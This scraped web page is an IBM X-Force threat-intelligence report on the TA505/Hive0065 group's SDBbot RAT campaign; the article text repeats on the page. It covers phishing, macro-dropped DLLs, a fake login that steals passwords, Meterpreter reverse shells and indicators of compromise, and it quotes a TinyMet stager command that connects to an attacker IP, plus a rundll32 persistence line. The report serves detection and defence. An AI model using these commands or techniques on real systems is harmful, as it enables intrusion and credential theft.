"2020-04-14T06:00:27-04:00", "dateModified": "2021-02-02T09:55:09-05:00", "publisher": { "@type": "Organization", "name": "Security Intelligence", "logo":{ "@type": "ImageObject", "url": "https://securityintelligence.com/wp-content/themes/security-intelligence/assets/img/logo.png" } }, "image": [ "https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg" ], "articleBody": "&lt;a 
href=&quot;https://www.ibm.com/security/services/ibm-x-force-incident-response-and-intelligence&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;IBM X-Force Incident Response and Intelligence Services (IRIS)&lt;/a&gt; responds to security incidents around the globe. During analysis and comparison of malicious activity on enterprise networks, our team identified attacks likely linked to Hive0065, also known as TA505. We observed that Hive0065 continues to spread the SDBbot remote-access Trojan (RAT) alongside other custom malware and continues to display tactics used against companies within the past year. Attacks that deploy malware and RATs on targeted networks are a way for cybercrime groups to compromise networks and open channels for further activity, which could be immediate, or take place at a later stage. RATs are a common tool in targeted attacks as they enable a vast array of remote actions for the attacker. Those include deploying additional malware, spying on users and carrying out actions from the infected device or server where they are installed. Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns delivering a wide range of custom and open-source malware. 
The most notorious among these are campaigns involving banking Trojans such as Dridex and &lt;a href=&quot;https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TrickBot&lt;/a&gt;, ransomware such as Clop/&lt;a href=&quot;https://securityintelligence.com/news/new-dll-cryptomix-ransomware-reportedly-using-remote-desktop-services-for-installation/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Cryptomix&lt;/a&gt; and MINEBRIDGE, and extortion schemes demanding payment in bitcoin. &lt;h2&gt;SDBbot and Familiar TTPs&lt;/h2&gt; In November 2019, X-Force IRIS observed a threat actor targeting enterprise employees in Europe with a spear phishing email impersonating Onehub&lt;a title=&quot;&quot; href=&quot;#_ftn1&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot; name=&quot;_ftnref1&quot;&gt;&lt;/a&gt;, a legitimate, cloud-based file-sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. Based on our investigation and analysis of the actor&#039;s tactics, techniques and procedures (TTPs), their command-and-control (C&amp;C) infrastructure and the use of specific malware previously attributed to the group, X-Force IRIS suspects it is highly likely that Hive0065 was behind the attacks. SDBbot RAT has been &lt;a href=&quot;https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;observed in Hive0065 attacks&lt;/a&gt; since at least September 2019 and has been used primarily as a secondary payload. 
This malware features remote-access capabilities, accepts commands from a C&amp;C server such as video recording, and has the ability to exfiltrate data from the victimized devices and networks. In a variety of campaigns attributed to this group previously reported by &lt;a href=&quot;https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Proofpoint&lt;/a&gt; and &lt;a href=&quot;https://www.zerofox.com/blog/ta505-halloween-malware/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ZeroFOX&lt;/a&gt;, Hive0065 was observed to be conducting phishing campaigns that delivered malicious Excel (.XLS) files hosted on domains spoofed to appear as the cloud storage sites Sync and Dropbox. The campaigns also featured C&amp;C infrastructure that spoofs other legitimate services, like Google Drive and Microsoft Office. More recent Hive0065 &lt;a href=&quot;https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;campaigns&lt;/a&gt; reported in March 2020 exploited the current interest in the COVID-19 pandemic, using Coronavirus-themed phishing emails to deliver the Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 targeted healthcare organizations with emails purporting to come from medical research groups and offering supposed Coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065/TA505, specifically the spoofing of cloud storage websites to distribute malware files. 
&lt;h2 class=&quot;&quot;&gt;Continued Malicious Activity&lt;/h2&gt; Research conducted during X-Force IRIS investigations found continued malicious activity from Hive0065 that infected company networks with malware and the SDBbot RAT. The TTPs that we found are consistent with previous activity attributed to Hive0065: &lt;ul&gt; &lt;li class=&quot;&quot;&gt;Spear phishing to deliver malware&lt;/li&gt; &lt;li class=&quot;&quot;&gt;Macro-enabled documents&lt;/li&gt; &lt;li class=&quot;&quot;&gt;The use of droppers containing embedded dynamic-link libraries (DLLs)&lt;/li&gt; &lt;li class=&quot;&quot;&gt;The use of an installer component&lt;/li&gt; &lt;li class=&quot;&quot;&gt;The use of legitimate cloud hosting services for malware distribution&lt;/li&gt; &lt;li class=&quot;&quot;&gt;Spoofing legitimate services like Microsoft and Google&lt;/li&gt; &lt;li&gt;C&amp;C domains similar in naming convention and structure (sample of domain names shown below)&lt;/li&gt; &lt;/ul&gt; &lt;table style=&quot;width: 100%;&quot; border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;&lt;strong&gt;Domains reported by X-Force&lt;/strong&gt;&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;&lt;strong&gt;Domains reported by Proofpoint&lt;/strong&gt;&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;&lt;strong&gt;Domains reported by ZeroFOX&lt;/strong&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;drm-server-booking[.]com&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;news-server-drm-google[.]com&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;office-en-service[.]com&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;font-size: 12px;&quot; 
valign=&quot;top&quot;&gt;microsoft-live-us[.]com&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;update365-office-ens[.]com&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;googledrive-download[.]com&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;dl1.sync-share[.]com&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;office365-update-en[.]com&lt;/td&gt; &lt;td style=&quot;font-size: 12px;&quot; valign=&quot;top&quot;&gt;d1.syncdownloading[.]com&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h2 class=&quot;&quot;&gt;Compromise Summary&lt;/h2&gt; In order to gain access to victim environments, Hive0065 sends a malicious email to employees purporting to be from an HR representative&#039;s account. The email body impersonated Onehub, inviting the recipient to download a malicious document named &lt;em&gt;Resume.doc&lt;/em&gt;. &lt;img style=&quot;margin: 8px auto;&quot; title=&quot;spear phish email to employee&quot; src=&quot;https://securityintelligence.com/wp-content/uploads/2020/04/onehub.png&quot; alt=&quot;Email Body Including Onehub&quot; width=&quot;411&quot; height=&quot;361&quot; /&gt; The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network. 
&lt;h2 class=&quot;&quot;&gt;Hive0065&#039;s Arsenal of Tools&lt;/h2&gt; &lt;h4 class=&quot;&quot;&gt;VSPUB DLLs With CobaltStrike Code Similarities&lt;/h4&gt; The malicious email delivering the file named &lt;em&gt;Resume.doc&lt;/em&gt; initially led the recipient to a malicious domain. After several redirections, the final redirect pointed to the malicious URL &lt;em&gt;hxxps://dl1.sync-share[.]com?Or2at&lt;/em&gt;. In addition, we also observed employees who opened the document browsed to &lt;em&gt;hxxps://dl1.sync-share[.]com&lt;/em&gt; and downloaded &lt;em&gt;Resume (1).doc&lt;/em&gt; and a second file, &lt;em&gt;Resume (3).doc&lt;/em&gt;. Seconds later, a suspicious document named &lt;em&gt;main_template.docx&lt;/em&gt; was created. Every time &lt;em&gt;main_template.docx&lt;/em&gt; was opened, VBA macros were executed and a fake Microsoft Office login window (&lt;em&gt;FakeL.exe&lt;/em&gt;) was displayed to the user while a malicious payload executed in the background. If the password entered was correct, the display disappeared. Password attempts were written into a file named &lt;em&gt;Password.txt&lt;/em&gt;, which was subsequently deleted. &lt;hr align=&quot;left&quot; size=&quot;1&quot; width=&quot;33%&quot; /&gt; &lt;img style=&quot;margin: 8px auto;&quot; title=&quot;fake windows login&quot; src=&quot;https://securityintelligence.com/wp-content/uploads/2020/04/fake-windows-login.png&quot; alt=&quot;Fake Login Display&quot; width=&quot;450&quot; height=&quot;103&quot; /&gt; The document may also display the fake message &quot;This document is protected&quot; to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system. 
The DLLs were dropped to the following locations: &lt;ul&gt; &lt;li class=&quot;left&quot; style=&quot;text-align: left;&quot;&gt;x86: %APPDATA%\Microsoft\Windows\Template\vspub1.dll&lt;/li&gt; &lt;li class=&quot;left&quot; style=&quot;text-align: left;&quot;&gt;x64: %APPDATA%\Microsoft\Windows\Template\vspub2.dll&lt;/li&gt; &lt;/ul&gt; The DLLs were loaded to the memory space of &lt;em&gt;winword.exe&lt;/em&gt; using LoadLibraryW API, and the DLL module was compressed twice to hide actual code. It used a custom packer that unpacks to UPX, an open-source executable packer, which revealed the actual code. &lt;img class=&quot;alignnone size-full wp-image-418038&quot; src=&quot;https://securityintelligence.com/wp-content/uploads/2020/04/si-img-customPacker.jpg&quot; alt=&quot;Image of a compressed module&quot; width=&quot;800&quot; height=&quot;73&quot; /&gt; While these DLLs did not match existing, known code families, a code comparison showed that this code has similarities with the &lt;a href=&quot;https://attack.mitre.org/software/S0154/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CobaltStrike&lt;/a&gt; framework. The VSPUB DLLs gather system information and use HTTP POST requests to send it to the C&amp;C domain &lt;em&gt;microsoft-live-us[.]com/fidonet&lt;/em&gt; or the IP address 185[.]176[.]221[.]45. Code suggests that upon successful reply from the server, the DLL can download and execute additional files. To note, &lt;em&gt;microsoft-live-us[.]com&lt;/em&gt; was registered just days before the attack took place, along with the domain &lt;em&gt;sync-share[.]com&lt;/em&gt;, to include subdomains &lt;em&gt;dl1.sync-share[.]com&lt;/em&gt;,&lt;em&gt; dl2.sync-share[.]com &lt;/em&gt;and &lt;em&gt;dl3.sync-share[.]com&lt;/em&gt;. 
&lt;em&gt;Sync-share[.]com&lt;/em&gt; is likely attacker-owned infrastructure, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in a similar fashion. &lt;h4 class=&quot;&quot;&gt;Meterpreter Reverse Shell&lt;/h4&gt; After the initial system was compromised, the actors proceeded to compromise additional systems on the network by executing malicious PowerShell services running as the local SYSTEM, as well as by installing bind shells. A Meterpreter reverse shell was used in order to remotely control compromised systems within the internal network; it was installed as a service using the execution of an encoded PowerShell script. The malicious PowerShell command decodes into a reverse shell connecting back to two malicious IP addresses: &lt;ul&gt; &lt;li class=&quot;&quot;&gt;91[.]214[.]124[.]20&lt;/li&gt; &lt;li class=&quot;&quot;&gt;91[.]214[.]124[.]25&lt;/li&gt; &lt;/ul&gt; While most samples we found during our investigations were Meterpreter reverse shells connecting back to a C&amp;C IP address, Meterpreter bind-shells that listen for incoming connections were also discovered. We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders. &lt;h4 class=&quot;&quot;&gt;TinyMet Meterpreter Stager&lt;/h4&gt; The investigation led our team to the discovery of a file named &lt;em&gt;wsus.exe&lt;/em&gt; (a version of TinyMet, a tiny, flexible Meterpreter stager), along with three additional files that were created and executed on the first compromised system. 
During the investigation, TinyMet was observed being executed with the command &lt;em&gt;c:\intel\wsus.exe 1 91.214.124[.]20 43434&lt;/em&gt;, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information. &lt;h2 class=&quot;&quot;&gt;SDBbot RAT&lt;/h2&gt; &lt;h4 class=&quot;&quot;&gt;SDBbot RAT Installer&lt;/h4&gt; X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot&#039;s code and strings upon execution. In addition, they read a binary blob located within the registry &lt;em&gt;HKLM\\MACHINE\\SOFTWARE\\Microsoft\\[3 characters]\[1 character]&lt;/em&gt;. Depending on user privileges, a binary blob is located in the registry value. If running with regular user privileges, the installer component will establish persistence using the registry &lt;em&gt;Run&lt;/em&gt; and execute ordinal #1 of the DLL: &lt;p class=&quot;&quot; align=&quot;center&quot;&gt;&lt;em&gt;rundll32 &quot;C:\Users\[USER]\AppData\Roaming\xrjkrobuy.dll&quot;,#1&lt;/em&gt;&lt;/p&gt; &lt;h4 class=&quot;&quot;&gt;SDBbot RAT Loader&lt;/h4&gt; As part of the investigation, X-Force IRIS found that the SDBbot RAT loader we analyzed was similar in nature to the version analyzed by &lt;a href=&quot;https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Proofpoint&lt;/a&gt;, which was defined as the &quot;Loader Component&quot; of SDBbot in Hive0065 campaigns from October 2019. The loader component will read the binary blob and execute the contained shellcode. Once the shellcode executes, it decompresses and executes the SDBbot payload. 
The shellcode will check to see if it was executed earlier than the loader DLL files and if found to be &quot;TRUE,&quot; the process is terminated. &lt;h4 class=&quot;&quot;&gt;SDBbot RAT Payload&lt;/h4&gt; Once the attackers established a foothold on the network, four new registry keys on the local Software hive were created and SDBbot RAT loader DLL files were installed as persistence mechanisms; the loaders were injected into the process &lt;em&gt;winlogon.exe&lt;/em&gt; every time the process was executed. Upon execution, SDBbot RAT checks for the presence of the mutex&lt;em&gt; windows_7_windows_10_check_running_once_mutex&lt;/em&gt; and proceeds to retrieve a C&amp;C address from the file &lt;em&gt;C:\ip.txt&lt;/em&gt;. If that file is not available, it will use the C&amp;C &lt;em&gt;drm-server-booking[.]com&lt;/em&gt; as the default server. SDBbot RAT will subsequently gather system information and communicate back to the C&amp;C server by sending and receiving a DWORD: 0xC0DE0000. The C&amp;C will send additional arguments depending on the command. &lt;h2&gt;Conclusion&lt;/h2&gt; Hive0065 has been active since at least 2014, adjusting its TTPs, targeting and infrastructure with each campaign. A relatively recent addition to Hive0065&#039;s toolkit, SDBbot, is being used in attacks primarily as a second-stage malware, composed of an installer, a loader and RAT components. SDBbot has the ability to perform typical RAT functions, such as communicating with C&amp;Cs, receiving commands and obtaining system information. On infected systems, this malware could grant attackers extensive ability to drop and execute additional malicious payloads, control infected systems and perform actions the legitimate user would have access to. Remote-access Trojans are one of the most prevalent tools in targeted attacks as they facilitate that type of control for remote attackers. 
As X-Force IRIS continues to track Hive0065, we expect to see this group continue to target a wide range of industries using social engineering to deliver open-source and custom malware while constantly adjusting TTPs and C&amp;C infrastructure to evade detection. &lt;h2&gt;Indicators of Compromise (IoCs)&lt;/h2&gt; &lt;p class=&quot;&quot;&gt;&lt;strong&gt;C&amp;C IP Addresses&lt;/strong&gt;&lt;/p&gt; &lt;ul&gt; &lt;li class=&quot;&quot;&gt;91[.]214[.]124[.]25&lt;/li&gt; &lt;li class=&quot;&quot;&gt;91[.]214[.]124[.]20&lt;/li&gt; &lt;li class=&quot;&quot;&gt;185[.]176[.]221[.]45&lt;/li&gt; &lt;/ul&gt; &lt;p class=&quot;&quot;&gt;&lt;strong&gt;C&amp;C Domains&lt;/strong&gt;&lt;/p&gt; &lt;ul&gt; &lt;li class=&quot;&quot;&gt;drm-server-booking[.]com&lt;/li&gt; &lt;li class=&quot;&quot;&gt;microsoft-live-us[.]com&lt;/li&gt; &lt;li class=&quot;&quot;&gt;dl1.sync-share[.]com&lt;/li&gt; &lt;/ul&gt; &lt;p class=&quot;&quot;&gt;&lt;strong&gt;URL Redirections&lt;/strong&gt;&lt;/p&gt; &lt;ul&gt; &lt;li class=&quot;&quot;&gt;https://eur01.safelinks.protection.outlook[.]com/?url=https://clck.ru/JnFFT&amp;data=02|01||bed42450519b40df4d8808d762bd4ff1|d847080b33824b27886012fe4d8edb27|1|0|637086437565223782&amp;sdata=0VDHXIfGUjxrbDC0fnF/VcgoQIGSAD/PBCYcwFodSH4=&amp;reserved=0&lt;/li&gt; &lt;li class=&quot;&quot;&gt;https://clck[.]ru/JnFFT&lt;/li&gt; &lt;li class=&quot;&quot;&gt;https://sba.yandex[.]net/redirect?url=https%3A%2F%2Fdl1.sync-&lt;/li&gt; &lt;li&gt;share.com%3FOr2at&amp;client=clck&amp;sign=2a3f3d25a38344769c6cfb6705a0f918&#039;&lt;/li&gt; &lt;/ul&gt; &lt;p class=&quot;&quot;&gt;&lt;strong&gt;Final Redirection Hosting Malicious Document&lt;/strong&gt;&lt;/p&gt; &lt;ul&gt; &lt;li class=&quot;&quot;&gt;https://dl1.sync-share[.]com?Or2at&lt;/li&gt; &lt;/ul&gt; &lt;p class=&quot;&quot;&gt;&lt;strong&gt;Files&lt;/strong&gt;&lt;/p&gt; &lt;table style=&quot;width: 100%; font-size: 12px;&quot; border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt; 
&lt;tbody&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;&lt;strong&gt;File name&lt;/strong&gt;&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;&lt;strong&gt;SHA1&lt;/strong&gt;&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;main_template.docx&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;33094acd614825a916b77df6c5141c088fc3768b&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;Malicious document&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;vspub1.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;bf0f7abda2228059bb00ec9658ee447fbe84d277&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;CobaltStrike similarities&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;vspub2.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;d40510da42a478d72e649993208710668a7f6c27&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;CobaltStrike similarities&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;xrjkrobuy.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;14f52ae68344e1643b3066c10f7044fdd819db4e&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;SDBot RAT&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;upywloeza.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;0cc7cca16afd632857e3883c06b2f55c057b563e&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;SDBot RAT&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;dtzvlbtxn.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;d36e983886a084887f887c6d562d3bc0664587c4&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;SDBot RAT&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;lvgoywrnxwy.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;fea7d944e317c7b2ef1aba57600a8c5310368085&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;SDBot RAT&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;qcuqqgxmy.dll&lt;/td&gt; &lt;td 
valign=&quot;top&quot;&gt;35423e04e58ab1f2267e19c47e1c69ea5b7041cc&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;SDBot RAT&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;pdxqzmftr.dll&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;fd9620c0c295caaee3096423532bb1dbfb7064c5&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;SDBot RAT&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;lowpro3.13.exe&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;cb0b39534d99057b02b090c3650fb1de43d19a02&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;Binary&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;wsus.exe&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;caff1d315a5d87014e5fa62346f58407755d971e&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;Meterpreter stager&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td valign=&quot;top&quot;&gt;FakeL.exe&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;45c43ec18d15ba7850e6ad2e2e54671636f4d926&lt;/td&gt; &lt;td valign=&quot;top&quot;&gt;Password Stealer&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt;" } </script> <!-- BREADCRUMB SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "https://schema.org", "@type": "BreadcrumbList", "itemListElement": [ { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://securityintelligence.com/" }, ] } </script> <div id="progressbar"> <amp-animation id="progress-animation" layout="nodisplay"> <script type="application/json"> { "duration": "1s", "iterations": "1", "fill": "both", "direction": "alternate", "animations": [{ "selector": "#progressbar", "keyframes": [{ "transform": "translateX(0)" }] }] } </script> </amp-animation> </div> <amp-position-observer target="post__content" intersection-ratios="0" viewport-margins="25vh 75vh" on="scroll:progress-animation.seekTo(percent=event.percent)" layout="nodisplay"></amp-position-observer> <div class="dark_background" style="background:black;"></div> <div class="container grid" style="background:black;"> 
<!-- Breadcrumbs --> <aside class="breadcrumbs "> <h1 class="breadcrumbs__page_title">TA505 Continues to Infect Networks With SDBbot RAT</h1> </aside> </div> <div class="container grid hero_background "> <div class="grid__content post "> <div class="post__thumbnail"> <amp-img alt="A security analyst conducts research on Hive0065&#039;s SDBbot RAT" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg.webp" srcset="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-300x158.jpg.webp 300w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg.webp 630w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg.webp 1200w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg.webp 2400w"> <amp-img fallback alt="A security analyst conducts research on Hive0065&#039;s SDBbot RAT" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg" srcset="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-300x158.jpg 300w, https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat-630x330.jpg 630w, https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg 1200w, https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg 2400w"> </amp-img> </amp-img> </div> <div class="new_categoy"> <div class="category-container"> <div 
class="category"> <div class="author_date"> <div class="information"> <span class="date">April 14, 2020</span> <span class="author_category">By <a href="https://securityintelligence.com/author/melissa-frydrych/" >Melissa Frydrych</a> </span> <span class="author_category"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 7</span> <span class="rt-label rt-postfix">min read</span></span></span> </div> </div> <hr class="separator"> <div class="title"> <a href="https://securityintelligence.com/category/x-force/threats/"><span class="name_category">Advanced Threats</span></a><br> <a href="https://securityintelligence.com/category/topics/incident-response/"><span class="name_other_category">Incident Response</span></a><br> </div> </div> </div> <main class="post__content post__content--continue_reading" id="post__content"> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html><body><p><a href="https://www.ibm.com/security/services/ibm-x-force-incident-response-and-intelligence" target="_blank" rel="noopener nofollow" >IBM X-Force Incident Response and Intelligence Services (IRIS)</a> responds to security incidents around the globe. During analysis and comparison of malicious activity on enterprise networks, our team identified attacks likely linked to Hive0065, also known as TA505. We observed that Hive0065 continues to spread the SDBbot remote-access Trojan (RAT) alongside other custom malware and continues to display tactics used against companies within the past year.</p> <p>Attacks that deploy malware and RATs on targeted networks are a way for cybercrime groups to compromise networks and open channels for further activity, which could be immediate, or take place at a later stage. 
RATs are a common tool in targeted attacks as they enable a vast array of remote actions for the attacker. Those include deploying additional malware, spying on users and carrying out actions from the infected device or server where they are installed.</p> <p>Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns delivering a wide range of custom and open-source malware. The most notorious among these are campaigns involving banking Trojans such as Dridex and <a href="https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" target="_blank" rel="noopener nofollow" >TrickBot</a>, ransomware such as Clop/<a href="https://securityintelligence.com/news/new-dll-cryptomix-ransomware-reportedly-using-remote-desktop-services-for-installation/" target="_blank" rel="noopener nofollow" >Cryptomix</a> and MINEBRIDGE, and extortion schemes demanding payment in bitcoin.</p> <h2>SDBbot and Familiar TTPs</h2> <p>In November 2019, X-Force IRIS observed a threat actor targeting enterprise employees in Europe with a spear phishing email impersonating Onehub, a legitimate, cloud-based file-sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. 
Based on our investigation and analysis of the actor&rsquo;s tactics, techniques and procedures (TTPs), their command-and-control (C&amp;C) infrastructure and the use of specific malware previously attributed to the group, X-Force IRIS suspects it is highly likely that Hive0065 was behind the attacks.</p> <p>SDBbot RAT has been <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" target="_blank" rel="noopener nofollow" >observed in Hive0065 attacks</a> since at least September 2019 and has been used primarily as a secondary payload. This malware features remote-access capabilities, accepts commands (such as video recording) from a C&amp;C server, and has the ability to exfiltrate data from the victimized devices and networks.</p> <p>In a variety of campaigns attributed to this group previously reported by <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" target="_blank" rel="noopener nofollow" >Proofpoint</a> and <a href="https://www.zerofox.com/blog/ta505-halloween-malware/" target="_blank" rel="noopener nofollow" >ZeroFOX</a>, Hive0065 was observed to be conducting phishing campaigns that delivered malicious Excel (.XLS) files hosted on domains spoofed to appear as the cloud storage sites Sync and Dropbox. 
The campaigns also featured C&amp;C infrastructure that spoofs other legitimate services, like Google Drive and Microsoft Office.</p> <p>More recent Hive0065 <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" target="_blank" rel="noopener nofollow" >campaigns</a> reported in March 2020 exploited the current interest in the COVID-19 pandemic, using Coronavirus-themed phishing emails to deliver the Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 targeted healthcare organizations with emails purporting to come from medical research groups and offering supposed Coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065/TA505, specifically the spoofing of cloud storage websites to distribute malware files.</p> <h2 class="">Continued Malicious Activity</h2> <p>Research conducted during X-Force IRIS investigations found continued malicious activity from Hive0065 that infected company networks with malware and the SDBbot RAT. 
